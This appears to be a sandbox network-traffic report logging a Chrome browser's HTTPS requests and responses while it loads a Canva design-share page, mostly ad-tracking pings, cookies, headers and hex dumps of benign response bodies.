                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=NsGba152%2BSkmEfYI48S23W5P7wqUzR%2BfwwCHvOBEnIR3GO4uWMjjSZr1rI8jdCOhBYCXB7V43N7yfX12CfzICCEMyX%2BurQpgG%2Bwz%2B5hmoLtsUHY%2FtjmM2E3ExmyVDg [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:42 UTC673INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:42 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                    set-cookie: FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:42 UTC71INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}
                                                                                                                                                                                                                                                    2024-12-19 21:27:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    78192.168.2.449833142.250.181.70443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:42 UTC1138OUTGET /activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2068683597;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=637042945;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1
                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: test_cookie=CheckForPermission; ar_debug=1
                                                                                                                                                                                                                                                    2024-12-19 21:27:43 UTC3135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:42 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Attribution-Reporting-Register-Trigger: {"aggregatable_deduplication_keys":[{"deduplication_key":"4755682881022738973"}],"aggregatable_trigger_data":[{"filters":[{"14":["13079090"]}],"key_piece":"0xb2ca467de4b8703b","source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]},{"key_piece":"0x3c36a1cffc7e43e9","not_filters":{"14":["13079090"]},"source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]}],"aggregatable_values":{"12":65,"13":6 [TRUNCATED]
                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Set-Cookie: ar_debug=1; expires=Sat, 18-Jan-2025 21:27:42 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                                                                                    Set-Cookie: IDE=AHWqTUls6xzziQPbuqrdooqi1iMK-iHWT3k2y2R3vyuLAOjl4syBAzkszbMM682f; expires=Sat, 19-Dec-2026 21:27:42 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    79192.168.2.449832142.250.181.70443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:42 UTC1352OUTGET /activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=247230614;gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102081485~102198178;ps=1;pcor=324257022;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a? HTTP/1.1
                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: test_cookie=CheckForPermission; ar_debug=1
                                                                                                                                                                                                                                                    2024-12-19 21:27:43 UTC3140INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:42 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Attribution-Reporting-Register-Trigger: {"aggregatable_deduplication_keys":[{"deduplication_key":"14078073121060000848"}],"aggregatable_trigger_data":[{"filters":[{"14":["16303776"]}],"key_piece":"0xe78a3ea2ad8a7037","source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]},{"key_piece":"0x9e1af8ddaae5efd4","not_filters":{"14":["16303776"]},"source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]}],"aggregatable_values":{"12":65,"13": [TRUNCATED]
                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Set-Cookie: ar_debug=1; expires=Sat, 18-Jan-2025 21:27:42 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                                                                                    Set-Cookie: IDE=AHWqTUkwgpRwLNKT7IORWh7Ugfto2VZSE_x_uyGdCyWu5pEK0EoTA32urfHN7AaB; expires=Sat, 19-Dec-2026 21:27:42 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    80192.168.2.449834172.217.17.66443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:42 UTC2468OUTGET /pagead/viewthroughconversion/804757079/?random=960307558&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20297%3Bevent_id%3D1734644380069_173464376514863%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_doctype_id%3DTAFJi5FXMSs%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd [TRUNCATED]
                                                                                                                                                                                                                                                    Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Attribution-Reporting-Eligible: trigger;navigation-source, event-source
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: test_cookie=CheckForPermission; ar_debug=1
                                                                                                                                                                                                                                                    2024-12-19 21:27:43 UTC2671INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:42 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Location: https://www.google.com/pagead/1p-conversion/804757079/?random=960307558&fst=1734643657472&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4c50v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20297%3Bevent_id%3D1734644380069_173464376514863%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_doctype_id%3DTAFJi5FXMSs%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&r [TRUNCATED]
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                                                                                    Set-Cookie: IDE=AHWqTUmnytPwtZc8kVzxi633SYePTJs1e5TiWZzsHPxe8IADZTCqciU56LPPqIZZ; expires=Sat, 19-Dec-2026 21:27:42 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    2024-12-19 21:27:43 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    81192.168.2.449837104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:43 UTC1563OUTGET /web/ed3781c5c1cc0c75.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D% [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 11354
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a741ea77c87-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71073
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "a5cbefa28174bdea24cca2d8cc328244"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:30 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: bFGIDFpfKn7JeSN8lJG0OUSRlZbctgvMRKom4UgqGR+SwbpiOPVsRnw/3xH9aMD0MGUlK7RziwU=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYW0HTB9JAEWM41
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: KynQya55P0qdCBIQgRV3BWz2bxQLvZd2
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4a 52 70 65 4e 45 4d 45 74 6e 74 71 5a 33 70 6f 6d 36 44 54 75 57 6b 44 4c 72 68 25 32 46 64 72 58 71 4e 5a 62 44 25 32 46 77 36 70 4b 63 4e 59 65 6f 79 4c 44 69 44 48 73 70 4d 4c 6a 71 63 55 4b 43 71 70 48 78 55 38 43 6e 76 79 72 53 55 25 32 46 79 56 6a 39 5a 79 48 6c 68 45 34 54 51 58 33 54 4f 75 6b 25 32 42 51 50 32 69 6e 4a 68 65 6f 43 47 44 76 25 32 42 45 35 73 76 7a 77 25 32 42 51 49 39 44 6f 75 64 49 32 52 66 69 43 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRpeNEMEtntqZ3pom6DTuWkDLrh%2FdrXqNZbD%2Fw6pKcNYeoyLDiDHspMLjqcUKCqpHxU8CnvyrSU%2FyVj9ZyHlhE4TQX3TOuk%2BQP2inJheoCGDv%2BE5svzw%2BQI9DoudI2RfiCs%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 39 31 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 35 33 34 32 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
